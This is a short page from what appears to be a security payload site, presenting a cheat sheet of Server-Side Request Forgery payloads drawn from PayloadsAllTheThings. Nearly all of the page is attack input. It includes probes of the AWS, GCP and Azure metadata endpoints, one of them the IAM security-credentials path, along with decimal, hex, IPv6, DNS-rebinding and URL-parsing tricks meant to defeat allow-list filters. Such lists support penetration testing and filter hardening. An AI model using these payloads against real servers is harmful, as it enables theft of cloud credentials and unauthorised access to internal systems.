vulns.co
/
GKData.io MCP

Back to Payloads

Server-Side Request Forgery

Point the server inward. Cloud metadata endpoints leak credentials; the bypass block (decimal/hex IP, IPv6, enclosed-alphanumerics, DNS rebinding hosts) defeats common allow-list filters.

Tags: ssrf, cloud, metadata, bypass

Controlled probes

  • http://127.0.0.1/
  • http://localhost:80/
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • http://169.254.169.254/latest/meta-data/ (AWS)  ·  http://metadata.google.internal/computeMetadata/v1/ (GCP, needs Metadata-Flavor: Google)
  • http://169.254.169.254/metadata/instance?api-version=2021-02-01 (Azure, needs Metadata: true)
  • http://[::1]/
  • http://2130706433/
  • http://0x7f000001/
  • http://127.0.0.1.nip.io/
  • http://localhost#@evil.com/
  • http://evil.com@127.0.0.1/

Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery